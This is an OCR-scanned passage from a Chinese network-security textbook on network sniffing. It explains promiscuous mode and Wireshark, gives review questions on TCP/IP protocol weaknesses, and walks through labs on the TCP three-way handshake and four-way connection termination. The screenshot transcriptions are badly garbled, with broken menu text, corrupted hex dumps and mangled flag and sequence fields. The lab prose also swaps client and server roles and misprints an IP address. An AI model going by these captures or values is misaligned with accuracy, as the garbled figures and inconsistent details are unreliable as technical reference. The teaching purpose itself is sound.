到 ,所 有 收 到 的 数据 帧 都 将 交 给 上 层 协 议 软件 处 理 。Hub 是 共享 介质 的 工作 方式 ,只 要 把 
主机 网 卡 设置 为 “混杂 ?模式 ,网 络 监听 可 在 任何 接口 上 实现 。 现 在 的 网 络 基本 都 用 交换 机 ， 
所 以 必须 把 执行 网 络 监听 的 主机 接 在 镜像 端口 上 ,才能 监听 到 整个 网 络 交换 机 上 的 网 络 信 
息 。 这 就 是 网 络 监听 的 基本 原理 。 


2.6.2 网 络 监听 工具 


计算 机 网 络 是 共享 通信 通道 的 ,这 意味 着 计算 机 能 够 接收 到 发 送 给 其 他 计算 机 的 信息 ， 
捕获 在 网 络 中 传输 的 数据 信息 就 称 为 窃听 (Sniffing)。 以 太 网 协议 的 特点 是 在 同一 网 络 向 
所 有 主机 发 送 数 据 包 信息 。 数 据 包 头 包含 有 目标 主机 的 地 址 ,一 般 情况 下 只 有 上 有 具有 该 地 址 
的 主机 才 会 接收 这 个 数据 包 。 如 果 一 台 主 机 能 够 接收 所 有 数据 包 , 而 不 理会 数据 包头 内 容 ， 
则 这 台 主 机 工作 在 “混杂 ”模式 。 

WireShark 是 可 以 运行 在 多 个 操作 系统 平台 上 的 开源 网 络 协议 分 析 工 具 软 件 ,其 主要 
作用 是 尝试 捕获 网 络 包 , 显示 包 的 详细 情况 。WireShark 捕获 电子 邮箱 账号 hack testing 
和 口令 hacktesting ,如 图 2-47 所 示 。WireShark 运行 显示 图 2-48 所 示 界 面 ,显示 捕获 的 流 
经 网 卡 的 大 量 数 据 包 。 在 图 2-49 中 ,第 一 个 窗 格 是 数据 包 列 表 窗 格 , 第 二 个 窗 格 是 协议 结 
构 细 节 窗 格 ,第 三 个 窗 格 是 数据 包 字 节 窗 格 。 


文件 (F) E) RNV) MG) ARO ”分 析 (A) ”统计 (5) EHE) 320) TET) WAH) 
amd 5*^xR5a-eezvizí5aaau 
NImmmsmm … cul E3-) se 
ËB Lat n 
.2 296 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 
296 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 
296 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 
125 POST /appcenter/ftentry.do?sid-kAqXmujSEdtjCjNSKOSSxHV1gKpLOZTo&func-uapp:listApps HTTP/1.1 (application/x-www-form-urlencoded) 
203 POST /cometd?1499348107630 HTTP/1.1 (application/x-www-form-urlencoded) 
362 POST /cometd?1499348109803 HTTP/1.1 (application/x-www-form-urlencoded) 
244 POST /cometd?1499348109806 HTTP/1.1 (application/x-www-form-urlencoded) 
244 POST /cometd?1499348110413 HTTP/1.1 (application/x-www-form-urlencoded) 
244 POST /cometd?1499348171683 HTTP/1.1 (application/x-www-form-urlencoded) 
244 POST /cometd?1499348232668 HTTP/1.1 (application/x-www-form-urlencoded) 
102 POST /contacts/call.do?uid-shblig126.com&sid-kAqXmujSEdt jC jNSKOSSxHV1gKpLOZTo&from-webnail&cmd-newapi.getContacts&vcardver-3. O&c... 
231 POST /56/w?sid-kAqXmujSEdtjCjNSKOSSxHVIgKpLOZTo&func-ntes:udproxy:getAttrs HTTP/1.1 (application/x-www-fonm-urlencoded) 
217 POST /js6/w?sid=kAqXmujSEdt jC jNSKOSSxHVIgKpLOZTo&funcentes:udproxy:getAttrs HTTP/1.1  (application/x-www-form-urlencoded) 
285 POST /js6/w?sid-kAqXmujSEdtjCjNSKOSSxHVIgKpLOZTo&funcentes:udproxy:getAttrs HTTP/1.1 (application/x-www-form-urlencoded) 
370 POST /js6/u?sid-kAqXmujSEdt.jCjNSKOSSxHVIgKpLOZTo&func-ntes:udproxy:getAttrs&welcome welcomemodule welcome show-l&deftabclick-tO&. 
89 POST /pushmessager/cmdsvr?cmd«pullMessages&sid«kAqXmujSEdtjCjNSKOSSxHV1gKpLOZTo&uideshblig126.com HTTP/1.1 (application/x-ww-f.. 
476 POST /weapi/user/playlist?ref-mail&csrf token- HTTP/1.1 (application/x-www-form-urlencoded) 
| r xw > 
> Frame 19778: 102 bytes on wire (816 bits), 102 bytes captured (816 bits) on interface @ 
> Ethernet II, Src: Giga-Byt_60:41:c@ (90:2b:34:60:41:c0), Dst: Tp-LinkT_6f:ac:d8 (3c:46:d8:6f:ac:d8) 
> Internet Protocol Version 4, Src: 192.168.1.102, Dst: 220.181.15.150 
|^ Transmission Control Protocol, Src Port: 64609, Dst Port: 80, Seq: 9597, Ack: 10864, Len: 36 
WU 3c 46 d8 6f ac d8 902b 34 60 41 c0 08 00 45 00 F.o. 
X 























a 
2 
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File Edit Vier Go Capture Analyze Statistics Telephony Tools Interndls Help 
BaaeéelsaEuxQGÓsneeosyzigB[BmBaaarm Wm > 


Filter M Expression... (| 

















No. Time Source Destination Protocol Length Info ^ 
6 5.001938 192.168.1.100 234.34.23.234 62 Source port: . ` 
7 6.184444 113.116.146.62 192.168.1.100 82 Source port: 


- 110 Destination . 


82 Source port: 
EEE] 192.168.1.100 5 4 110 ü 

11 10.004181  192.168.1.100 62 Source port: . 
12 10.004194  192.168.1.100 234.34.23.234 62 Source port: . 
13 13.035302  192.168.1.100 192.168.1.1 74 standard quer: 
14 13.057656 192.168.1.1 192.168.1.100 120 standard quer: 
15 13.824326  192.168.1.100 192.168.1.1 71 Standard quer: 
16 13.844720 192.168.1.1 192.168.1.100 114 Standard quer: 
17 13.940 "E K ij 3 

18 13.940073 220.181.111.78 66 4. 

19 13.973615 192.168.1.100 66 http » 4468 [ 
20 13.973714 220.181.111.78 54 4468 > http [¿ 


> 


由 Frame 17: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
& Ethernet II, Src: IntelCor 85:1f:b7 (00:13:20: f:b7), Dst: Tp-LinkT e4:c8:ce (e0:05:c5:e| 
& Internet Protocol, src: 192.168.1.100 (192.168.1.100), Dst: 220.181.111.78 (220.181.111.78) 


7.354998 — 125.120.161.214 192.168.1.100 





























O| Frane (fane), 66 bytes Packets: 308 Displayed: 308 Marked: O … | Profile: Default 
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le Tat Yie Go Ceture dedyre Statistics Telephony els Interns Nap 








"Uweawacuxeani.o9orzz2jBsQaaaBmwr"*x!gu 
Filteri |top q | Expression.. Clew — 5550 
Tin jour c 


> http 
> http 
> http 
> http 
66 http > 4468 
































ACK] Segel Ack=1 win=63825 Len=0 
Seq=0 win«64240 Len=0 MSS=1460 WS=1 SA 
Seq-0 win-64240 Len=0 MSS-1460 ws-l SA 
ACK] Seqe0 Ack=1 win=64240 Len=0 MSS«l. 


17 13.940056 
18 13.940073 
19 13.973615 






20 13.973714 20.181.111.78 54 4468 > http Seqel Ack=1 win=64800 Len=0 

22 13.975879 192.168.1.100 220.181.111,78 HTTP 543 GET /Images/track.Gif7level-l&page»TndexStypevaccessár el 
25 14.008620 192.168.1.100 220.181.111.174 TCP 66 4469 > http [SYN] Seq=0 win=64240 Len=0 MSS=1460 WS=1 SA 
26 14.008650 192.168.1.100 220.181.111.174 TCP 66 4469 > http [SYN] seq=0 win=64240 Len=0 MSS=1460 ws=1 SA 
27 14.010946 192.168.1.100 220.181.111.174 TCP 66 4470 > http [SYN] seq=0 Win=64240 Len=0 MSS-1460 Ws=1 SA 
28 14.010966 192.168.1.100 220.181.111.174 TCP 66 4470 > http [SYN] seq=0 win-64240 Len=0 MSS«1460 wS«l SA 
2914.012174 192.168.1.100 220.181.111.174 — TCP 56 4471 > http [SYN] Seq-0 win-64240 Len-0 MSS-1460 wS=1 SA 
3014.012187 192.168.1.100 220.181.111.174 TCP 664471 > http [SYN] Seq-0 win-64240 Len-0 MSS-1460 WS=1 SA 
31 14.013267 192.168.1.100 220.181.111.78 TCP 66 4472 > http [SYN] Seq«0 win-64240 Len=0 MSS-1460 WS=1 SA 
32 14.013279 192.168.1.100 220.181.111.78 TCP 66 4472 > 








http [SYN] Seq-0 win=64240 Len=0 MSS=1460 ws-l Es 
» 









$ Frame 25: 66 on wire (528 bits), 66 bytes capture 
|s Ethernet II, src: Intelcor.85:1f:b7 (00:13 1f:b7), Ost: Tp-LinkT.e4:cB:ce (e0:05:c5:e4:c8:ce) 
|s Internet Protocol, src: 192.168.1.100 (192.168.1.100), Dst: 220.181.111.174 (220.181.111.174) 





Source port: 4469 (4469) 
Destination port: http (80) 

[stream index: 3] 

Sequence number: 0 — (relative sequence number) 
Header length: 32 bytes 








Reserved: Not set 
Nonce: Mot set 
Congestion window Reduced (CWR): Not set 


_ EcM-echa: Mor ser 











E CE ce 7 TX) 
00 34 2c 4e 40 00 40 06 00 06 cO a8 Ol 64 dc b5 
O20 6f ae 11 75 00 50 6a 28 e2 ca 00 00 00 00 80 02 
[030 fa fo 06 ff 00 00 02 04 05 b4 01 03 03 00 or 01 














E 2-49 WireShark 捕获 的 TCP 数据 包 
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习 题 2 


2-1 ARP 协议 存在 哪些 缺陷 ? 这 些 安全 缺陷 的 根源 是 什么 ? 
2-2 IP 协议 存在 哪些 缺陷 ? 这 些 安全 缺陷 的 根源 是 什么 ? 
2-3 TCP 协议 存在 哪些 缺陷 ? 这 些 安全 缺陷 的 根源 是 什么 ? 
2-4. UDP 协议 存在 哪些 缺陷 ? 这 些 安全 缺陷 的 根源 是 什么 ? 
2-5 DNS 协议 存在 哪些 缺陷 ? 这 些 安全 缺陷 的 根源 是 什么 ? 
2-6 列举 两 种 针对 HTTP 协议 的 攻击 ,并 说 明 其 攻击 过 程 。 
2-7 Windows 是 如 何 生成 TCP 序列 号 的 ? 

28 TCP/IP 协议 栈 存 在 安全 威胁 的 根源 是 什么 ? 

2-9 简 述 TCP 协议 中 连接 的 建立 和 释放 过 程 。 


实 训 2.1 WireShark 分 析 TCP 三 次 握手 建立 连接 过 程 


【 实 训 目的 】 


(D 学 会 WireShark 的 使 用 方法 ,掌握 利用 WireShark 捕获 和 分 析 数 据 包 的 方法 。 
@ 加 深 理解 TCP 三 次 握手 过 程 ,了 解 网 络 协议 的 工作 原理 。 

C 加 深 理解 IP、TCP 等 数据 包 格 式 。 

@ 了 解 HTTP 等 应 用 层 协 议 的 数据 包 传输 模式 。 


【 实 训 环境 】 
一 台 运 行 Windows 操作 系统 并 与 Internet 相连 的 计算 机 。 
【 实 训 内 容 】 


1. TCP 三 次 握手 

通常 TCP 连接 的 建立 需要 三 次 握手 。TCP 连接 的 建立 过 程 如 下 。 

CD 客户 端 发 送 一 个 SYN 报 文 段 指明 客户 连接 的 服务 器 的 端口 以 及 初始 序号 ISN ,这 
个 SYN 段 称 为 报 文 段 1 。 

(2) 服务 器 发 回 包 含 服务 器 的 初始 序号 的 SYN 报 文 段 ( 报 文 段 2) 作 为 应 答 。 同 时 ,将 
确认 序号 设置 为 客户 的 ISN 加 1, 以 对 客户 的 SYN 报 文 段 进行 确认 。 一 个 SYN 将 占用 一 
个 序号 。 

(3) 客户 必须 将 确认 序号 设置 为 服务 器 的 ISN 加 1, 以 对 服务 器 的 SYN 报 文 进行 确认 
( 报 文 段 3) 。 

这 个 连接 建成 后 ,一 直 保 持 活动 状态 ,直到 超时 或 任何 一 方 发 出 FIN( 结 束 ) 信 号。 
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过 滤 数 据 包 
从 如 图 2-48 所 示 捕 获 的 数据 包 中 过 滤 TCP 协议 数据 包 显 示 的 信息 ,如 图 2-50 所 示 。 


File Edit View Go Capture Analyre Statistics Telephony Tools Internals Help 
Bus Qa SALZA s ° >o Oo aaam >» 


Filter: | tep ` | Expression.. Clear Apply 












No. Destination Protocol, Info 





Tine 





d-port » http [SYN] - 


15 3.254274 192.168.1.100 220.181.126.53 TCP 66 emsd-port > http [SYN] Seq=0 winzé4240 L 
16 3.290585 220.181.126.53 192.168.1.100 TCP 66 http > emsd-port [SYN, ACK] Seq=0 Ack=1 
17 3.290637  192.168.1.100 220.181.126.53 TON 54 emsd-port > http [ACK] Seq-i Ack=1 win-é 
19 3.314663  192.168.1.100 — 220.181.126.53 HTTP 325 GET /v3/safeup. app. cab?autoupdate=truesr 
21 3.360043 220.181.126.53 192.168.1.100 HTTP 290 HTTP/1.1 200 OK 
22 3.360094  220.181.126.53  192.168.1.100 TCP 60 http > emsd-port [FIN, ACK] Seq=237 Ack- 
23 3.360130  192.168.1.100 — 220.181.126.53 TCP 54 emsd-bort > http [ACK] Seqe272 Acke238 w 
ii | » 


1 Frame 14: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 

Œ Ethernet II, Src: IntelCor.85:1f:b7 (00:13:20:85:1f:b7), Ost: Tp-LinkT.e4:c8:ce (e0:05:c5:e4:c8:ce) 
& Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Dst: 220.181.126.53 (220.181.126.53) 

国 












0000 eo os CS e4 cg ce 00 13 20 85 1f b7 08 00 45 00 
0010 00 34 84 dO 40 00 40 06 98 fc cO a8 01 64 dc bs 
0020 7e 35 07 88 00 50 08 5d bc 91 00 00 00 00 80 02 
0030 fa fo 8a 69 00 00 02 04 05 b4 01 03 03 00 01 01 
0040 04 02 









































| File: "C:\Documents and SettingsMAdmine | Packets: 12522 Displayed: 12081 Marked: O- | Profile: Default 
图 2-50 TCP 协议 数据 包 


过 滤 出 符合 条 件 的 数据 包 后 ,就 可 以 对 感 兴趣 的 数据 包 进 行 分 析 了 。 在 数据 包 列 表 窗 
格 中 可 以 看 到 被 捕获 的 数据 包 的 基本 信息 ,包括 所 选中 数据 包 的 源 地 址 .目的 地 址 .该 数据 
包 所 属 的 协议 等 ; 在 中 间 的 “数据 包 细节 信息 ? 窗 格 中 可 以 得 到 被 捕获 的 数据 包 的 更 多 信 
息 , 主 要 包括 Frame、Ethernet [| ,IP 和 TCP 等 节点 ,展开 这 些 节点 可 以 得 到 该 数据 包 中 携 
带 的 更 详尽 的 信息 ,如 主机 的 MAC 地 址 (Ethernet I) IP 数据 包 结 构 中 各 字段 与 标识 的 
值 .TCP 数据 包 结构 中 各 字段 与 标识 的 值 等 。 

在 图 2-50 中 ,序号 为 15、16 和 17 的 3 条 记录 是 TCP 的 三 次 握手 过 程 。 

3. 分 析 数 据 包 

第 一 次 握手 ; 可 以 看 到 192. 168. 1. 100 用 端口 号 1928 向 HTTP 服务 器 220. 181. 126. 53 
的 80 端口 发 送 一 个 连接 请 求 。 这 个 报 文 段 的 序号 为 0,SYN 二 1, 如 图 2-51 所 示 。 

第 二 次 握手 : HTTP 服务 器 220. 181. 126. 53 用 80 端口 向 客户 端 192.168. 1. 100 的 端 
口号 1928 确认 刚才 的 连接 请 求 。 这 个 报 文 段 的 序号 为 0 ,确认 序号 为 图 2-51 中 客户 端 发 送 
的 报 文 段 序号 十 1, 也 就 是 0 十 1==1,SYN==1, ACK=1, WA 2-52 所 示 。 

第 三 次 握手 : 客户 端 发 送 一 个 带 序号 的 报 文 对 服务 器 刚才 发 送 的 报 文 进行 确认 。 这 次 
发 送 的 报 文 的 序号 为 1, 确 认 序号 为 图 2-52 中 服务 器 发 送 的 报 文 段 序号 十 1, 也 就 是 0 十 1， 
SYN==0,ACK=1, 如 图 2-53 所 示 。 
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Hile Edit Yiw Go Capture Amlyre Statistics Telephony Ieelx Intemals Help 
aaa BAXT s < so Bis aaami Mn y) 


Filter: | te Expression.. Clear Apply 


No Tine Source stination, Protocol Info 





















16 3.290565 192.168.1.100 TCP 
17 3.290637 220.181.126.53 TCP 





Source port: emsd-port (1928) 
Destination port: http (80) 
[Stream index: 1] 
Sequence number: 0 — (relative sequence number) 
Header length: 32 bytes 
.EUDIMOL MD IEEE IRI —————————— sa 
. Reserved: Not set 
Nonce: Not set 
Congestion window Reduced (CWR): Not set 
ECN-Echo: Not set 
Urgent: Not set 
Acknowledgement: Not set 
Push: Not set 


= [Expert Info (chat/sequence): connection establish request (SYN): server port http] 
[Message: connection establish request (SYN): server port http] 
[Severity level: chat] 
[Group: sequence] 
een seee sss0 = Fin: Not set 
Window size value: 64240 
[Calculated window size: 64240] 
S Checksum: oxsa63 [validation disabled] 
[Good checksum: False] 
[Bad checksum: False] 











99 40 06 CO as 01 64 dc bs 
50 08 5d $0 00 00 00 60 02 
60 02 04 91 03 03 00 01 
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Hile Edit Xie Go Capture Analyre Statistics Telephony Tools Internals Help 
BuaegaubuxeBauosoTA 


Hilter: [ter Session Clerus 


No. Tima |Seurce. Destination 
15 3.254274  192.168.1.100 — 220.181.126.53 




















17 3.290637 





Source port: http (80) 

Destination port: emsd-port (1928) 

[stream index: 1] 

Sequence number: 0 (relative sequence number) 
Acknowledgement number: 1 (relative ack number) 
Header length: 32 bytes 


+ ree. = Reserved: Not set 
= nonce: Not set 
= Congestion window Reduced (CWR): Not set 
^0.. eee. = ECN-EChO: Not set 
= Urgent: wot set 
= Acknowledgement: Set 
= Push: wot set 
Lil. srl. .0.. = Reset: NOT set 
~ 
G [Expert Info (chat/Sequence): connection establish acknowledge (SYN+ACK): server port http] 
[Message: Connection establish acknowledge CSYN+ACK): server port http] 
[Severity level: chat] 
[Group: Sequence) 
eee eer 2110 = Fin: Not set 
Window size value: 65535 
[calculated window size: 65535] 
E Checksum: oxb16b [validation disabled] 
[Good Checksum: False] 











00 13 20 85 1f by eO OS cs es c8 ce 08 00 45 00 
00 34 99 cd 40 00 38 06 sb ff dc bs 7e 35 cO as 
01 64 00 50 07 88 72 23 62 cc 08 Sd bc 92 80 12 
ff ff bi cb oo oo 02 os 05 ao 0103 03 03 04 02 


[G ril. “C VDocments and Settines Minin Packets: 12522 Dieplayed 12091 Marked. O ~» | Profile: Default — F 


图 2-52 ”建立 连接 一 一 第 二 次 握手 
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Tile Edit Vier Go Capture Analyze Statistics Telephony Tools Internals Help 


Bum Qel Em x@ al e e *#s [ss a aami iama = 





Filter: [tep | Expression.. Clear osl: 





Di. Time Source Destination  Frotecol Length Info ^ 
15 3.254274  192.168.1.100 — 220.101.126.53 G6 ems-port > http [SYN] Seqcó win=ç4z40 Le. | 
16 3.290585  220.181.126.53 — 192.168.1.100 G6 http > emsd-port [SYN, ACK] Seq-o Ackel w 
17 3.290637 19; 20.181.126.53 TCP 54 emsd-port > http [Ack] seq=1 ack=1 win=e s 





& Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Ost: 220.181.126.53 (220.181.126.53) ^ 
5 Transmission Control Protocol, Src Port: emsd-port (1928), Ost Port: http (80), Seq: 1, Ack: 1, Len: 0 
Source port: emsd-port (1928) 
Destination port: http (80) 
[stream index: 1] 
Sequence number: 1 (relative sequence number) 
Acknowledgement number: 1 (relative ack number) 
Header length: 20 bytes 
Flags: Ox10 (ACK) 
oa Reserved: Not set 
Nonce: Not set 
Congestion window Reduced (CWR): Not set 
ECH-Echo: Not set 
Urgent: Not set 
Acknowledgement: set 
Push: Not set 
Reset: Not set 
Syn: Not set 
ies 0 = Fin: Not set 
Window size value: 64800 
[Calculated window size: 64800] 
[window size scaling factor: 1] 
E checksum: oxf403 [validation disabled] 
[Good Checksum: False] 
[Bad Checksum: False] 
国 [SEQ/ACK analysis) 


[0000 eo os cs e4 cs ce oo 13 20 85 1f b7 08 00 45 00 


oo30 fd 20 f4 03 00 00 


[File "C Wecuents end SettingsWAdmines | Packets. 12522 Displayed. 1208] Marked O - | Profile Default 
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实 训 2.2 WireShark 分 析 TCP 四 次 握手 终止 连接 过 程 


【 实 训 目的 】 


(D 学 会 WireShark 的 使 用 方法 ,掌握 利用 WireShark 捕获 和 分 析 数 据 包 的 方法 。 
© 加 深 理解 TCP 四 次 握手 过 程 , 了 解 网 络 协议 的 工作 原理 。 

© 加 深 理解 IP, TCP 等 数据 包 格 式 。 

@ 了解 HTTP 等 应 用 层 协议 的 数据 包 传 输 模式 。 


【 实 训 环 境 】 
一 台 运 行 Windows 操作 系统 并 与 Internet 相连 的 计算 机 。 
【 实 训 内 容 】 


1. TCP 四 次 握手 

终止 TCP 连接 ,需要 四 次 握手 ,因为 TCP 连接 是 全 双 工 通信 ,因此 每 个 方向 必须 单独 
进行 关闭 。TCP 连接 的 终止 过 程 如 下 。 

CD 首先 发 送 关 闭 的 一 方 ( 即 发 送 第 一 FIN ,一 般 是 客户 端 ) 将 执行 主动 关闭 ,而 另 一 方 
( 收 到 这 个 FIN) 执 行 被 动 关闭 。 通 常 一 方 完 成 主动 关闭 , 另 一 方 完 成 被 动 关闭 。 
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(2) 当 接 收 方 (服务 器 端 ) 收 到 关闭 方 即 发 送 方 的 FIN, TCP 服务 器 向 应 用 程序 传送 一 
个 文件 结束 符 ,然后 它 发 回 一 个 ACK ,确认 序号 为 收 到 序号 加 1。 和 SYN 一样 ,一 个 FIN 
将 占用 一 个 序号 。 

CD 服务 器 端 关闭 它 的 连接 ,又 向 TCP 客户 端 发 送 另 一 个 FIN. 

(4) 当 客 户 端 收 到 服务 器 端 发 送 的 FIN 时 ,客户 端 就 必须 发 回 一 个 确认 ,并 将 确认 序 
设置 为 收 到 序号 加 1。 

过 滤 数 据 包 

从 如 图 2-53 所 示 捕 获 的 数据 包 中 ,过 滤 TCP 协议 数据 包 显 示 的 信息 ,如 图 2-54 所 示 ， 

序号 为 22、23、26 和 27 的 4 条 记录 是 TCP 的 终止 握手 过 程 。 














Filter 
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File Edit View Go Capture Analyre Statistics Telephony Tools Internals Help 


&aaa a Axxa s. e +o T E 






Saaana maxx] E 








M| Eoression. 





Do Time Source Destination Protocol Length Info 5| 
21 3.360042 
23 3.360130 
25 3.400686 
26 3.400699 


27 3.435940 
28 8.669314 












220.181.126.53 — 192.168.1.100 GDLL 


220.181.126.53  TCP 








TCP 54 emsd-port > http [FIN, ACK] Seq=272 Ack=238 Wii 
Tee 54 emsd-port > http [FIN, ACK] Seq=2?2 Ack=236 Wii 
TCR 60 http > emsd-port [ACK] Seq=238 Ack=273 Win=662: 
54 persona > http [FIN, ACK] Seqel Ackei win=6480( 
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š 


4 Frame 22: 60 bytes on wire (480 bits), 60 bytes captured (480 bits) 
Ethernet II, Src: Tp-LinkT.e4:cs:ce (e0:05:c5:e4:c8:ce), Det: IntelCor B$:1f:b7 (00:13:20:85:1f:b7) 
B Internet Protocol, src: 220.181.126.53 (220.181.126.53), 0: 





92.168.1.100 (192.168.1.100) 











0000 oo 13 20 8S 1f b7 e0 OS 
010 100 28 3c 03 40 00 38 06 89 ds dc bs 7e 35 cO as 
0020 01 64 00 50 07 88 72 23 63 b9 O8 Sd bd al SO 11 
o030 20 Së ce do 00 00 00 00 00 00 00 00 







C5 e4 C8 ce 08 00 45 00 























File "C Wocusents and Settings Vdnines- 


| Profile: Default 





Packets: 12522 Displayed 12522 Marked: O Load tiw 





2-54 TCP 数据 包 


3. 分 析 数 据 包 


(1) 第 一 


次 握手 。 客 户 端 220. 181. 26. 53 用 端口 80 对 服务 器 192. 168. 1. 100 端口 


1928 发 送 一 个 序号 为 237 的 FIN 报 文 ,FIN==1,ACK=1, 如 图 2-55 所 示 。 


(2) 第 二 


次 握手 。 服 务 器 192. 168. 1. 100 用 端口 1928 对 客户 端 220. 181. 26. 53 端口 


80 发 送 一 个 序号 为 272 的 确认 报 文 , 它 的 ACK 序号 为 238(237 十 1) ,ACK 王 1, 如 图 2-56 所 示 。 


(3) 第 三 





-次 握手 。 服 务 器 端 又 发 送 了 一 个 序号 为 272 的 FIN 报 文 , 可 以 看 到 这 个 报 文 


的 序号 和 ACK 序号 与 上 面 一 个 报 文 一 样 ,FIN 王 1,ACK 王 1, 如 图 2-57 所 示 。 
(4) 第 四 次 握手 。 客 户 端 发 送 一 个 序号 为 238 的 确认 报 文 , 它 的 ACK 序号 为 273(272 十 1)， 
ACK=1, 40A] 2-58 所 示 。 
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lile Edit Vier Ge Capture Analyze Statistics Telephony Tools Internals Help 
BaaeeacuxensuoesoTi &«aamiasexiu 


Filter Expression .. C Apply 

















m Tine Source Destination Protocol Len Info 
23 3.360130  192.168.1.100  220.181.126.53 


25 3.400686  192.168.1.100 — 220.181.126.57 [FIN, ACK] Seqe272 Ack=238 Wir 
26 3.400699  192.168.1.100 ^ 220.181.126.53 emsd-port > http [FIN, ACK] Seq=272 Ack=238 Wit 
27 3.425940. 220.181.126.53 — 192.168.1.100 http > emsd-port [ACK] Sequ238 Acke273 win=662: š 


ai 

c Transmission Control Protocol, Sre Port: http (80), Ust Port: emsd-port (1920), Seq: 237, Ack: 272, Len: O ~ 

Source port: http (80) 

Destination port: emsd-port (1926) 

[stream index: 1] 

Sequence number: 237 (relative sequence number) 

Acknowledgement number: 272 (relative ack number) 

Header length: 20 bytes 





Not set 
Congestion window Reduced (cw 
ECN-Echo: Not set 
Urgent: Not set 
Acknowledgement: set 
Push: Not set 

Not set 


& [Expert Info (chat/Sequence): Connection finish (FIN)] 
[Message: Connection finish (FIN)] 
[Severity level: chat] 
[Group: Sequence] 

window size value: 8260 








ooo 00 13 20 85 1f b7 e0 os cs e CG ce 08 00 45 OD .. mn... .FE. 
0010 oo 28 9c 03 40 00 38 06 89 de dc bs 7e 35 coas  [..9.8. 1115 
0020 01 64 00 50 07 88 72 23 63 b9 08 sd bd al 50 11  ld;P..re C..]..P- 
0o30 20 ss ce do 00 00 00 00 00 00 00 00 Mead, sasa 





Tile "C ecuments und Settings Adnin | Packets. 12522 Displayed: 12522 Marked O Lead tiv | Profile. Default 
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TT T I TITRE TIU TU 
BaügabuxeanacesoziiBB aaamaz"xu 


mie NH 








No. Time Source Destination Protocol Length Info 
32 3.360094  220.181.126.53 — 192.168.1.100 60 http > emsd-port [FIN, ACK] Seq=237 ACke272 Wit 


54 emsd-port > hi z 


^ 








25 3.400686  192.160.1.100 — 220.101.126.5 54 emd-port > http [FIN, ACK] Seq=272 Ack=238 Wi! 
26 3.400699 192.168.1.100 220.161.126.53 54 emsd-port > http [FIN, ACK] Seq=272 Ack-238 wit 
17 3.425940  220.101.126.52 — 192.168.1.100 60 http > emsd-port [ACK] Seq=238 Ack=273 WineGG2is 





[ai Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Ost: 220.181.126.53 (220.181.126.53) 
Ej Transmission Contro! Protocol, src Port: emsd-port (1928), Dst Port: http (80), Seq: 272, Ack: 238, Len: 0 
Source port: emsd-port (1928) 
Destination port: http (80) 
[Stream index: 1] 
Sequence number: 272 (relative sequence number) 
Acknowledgement number: 238 — (relative ack number) 
Header length: 20 bytes 
S Flag Cack) 
Reserved: Not set 
Nonce: Not set 
Congestion window Reduced (CWR): wot set 
ECN-Echo: Not set 
Urgent: Not set 
Acknowledgement: set 
Push: Not set 
Reset: Not set 
Syn: Not set 
a> Fin: Mot set 
Window size value: 64564 
[Calculated window size: 64564] 
[window size scaling factor: 1] 
国 Checksum: Oxf2f3 [validation disabled] 
 [SEQ/ACK analysis] 




















Frame (frame), 54 bytes Packets- 12522 Displayed: 12522 Marked: O Load tic Profile Default 


图 2-56 ”终止 连接 一 一 第 二 次 握手 
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Eile it Vm Ge Capture dedyze Statisties Telephony Teels Internals lp 
Baawalbcux2s2aseesoriBBaaanaesmxiH 


Filter Expression 











to. Source Destination Protocol Length Info «| 
22 3.360094 — 220.181.126.53 — 192.168.1.100 60 http > emsd-port [FIN, ACK] Seq-237 Ack=272 Wii 
23 3.360130 — 192.168.1.100 ^ 220.181.126.57 emsd-port > http [ACK] seq=272 Acke238 winecási 


25 3.400686 — 192.168.1.100 — 220.181.126.53 CT EN 


27 3.435940  220.181.126.53 192.168.1.100 Metp > emsd-port [ACK] ScQ=236 ACk=273 WIn=662 


am » | 
æ Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Ust: 220.181.126.53 (220.181.126.53) 
T Transmission Control Protocol, Sre Port: emd-port (1928), Ost Porti ttp (90), Seq: 272, Ack: 238, Len | 
Source port: emsd-port (1528) 
Destination port: http (80) 
[Stream index: 1] 
Sequence number: 272 (relative sequence number) 
Acknowledgement number: 238 (relative ack number) 
Header length: 20 bytes 





Reserved: Not set 
Nonce: Not set 

Congestion window Reduced (CWR): Not set 
ECN-Echo: Not set 

Urgent: Not set 

Acknowledgement: set 

Push: Not set 

Reset: Nor set 


S [Expert Info (chat/sequence): connection finish (FIN)] 
[Messager connection finish (FIN)] 
[Severity level: chat] 
[Group: Sequence] 


C$ e4 c8 ce 00 13 120 8$ 1f b7 08 00 45 00 
$4 dé 40 00 40 06 $9 02 cO aS 01 64 dc b5 
07 88 00 50 06 5d bd al 72 23 63 ba 50 11 
人 f2 00 00 











Fe scusenis und Soitin inin: | Packets: 12522 Displayet 12 Fre Defui 








2-57 ”终止 连接 一 一 第 三 次 握手 


Ds Bat Vm Ge Capture delyre Statistics Telephony Jools Intermls Help 
Susa mx At +ə F24 [ms aaan asmia 


nme | M| Eeyression 


o Tine Source Destination Protocol Length Info ^| 
22 3.360094 — 220.181.126.53 — 192.168.1.100 60 http > emsd-port [FIN, ACK] Seq=237 Ack=272 Wir 
23 3.360130 — 192.168.1.100 — 220.181.126.53 S4 emsd-port > http [ACK] seq=272 Acke238 Win=645i 





25 3.400686 。 192.168.1.100  220.181.126.53 $4 emsd-port > http [FIN, ACK] Seqe272 Ack=238 Wir 
26 3.400699 — 152.168.1.100 — 220.161.126.53 Sa emsd-port > http [FIN ACK] seqnz7z Ackei38 Wir 





15 Internet Protocol, src: 220.181.126.53 (220.181.126.53), Ot: 192.168.1.100 (192.168.1.100) 
© Transmission control Protocol, src Fort: http (80), Ost Port: emsd-port (1928), Seq: 238, Ack: 273, Lem: 0 
Source port: http (80) 
Destination port: emsd-port (1928) 
[Stream index: 1] 
Sequence number: 238 — (relative sequence number) 
Acknowledgement number: 273 (relative ack number) 
Header length: 20 bytes 
0x10 (Ack) 
s... = Reserved: Not set 
Nonce: Not set 
Congestion window Reduced (CWR): Not set 
ECN-Echo: Not set 
Urgent: Not set 
Acknowledgement: set 
Push: Not set 
Reset: Not set 
Syn: Not set 
Fin: Not set 
window size value: 8279 
[Calculated window size: 66232] 
[window size scaling factor: 8] 
Checksum: üxcedo [validation disabled] 
[SEQ/ACK analysis] 








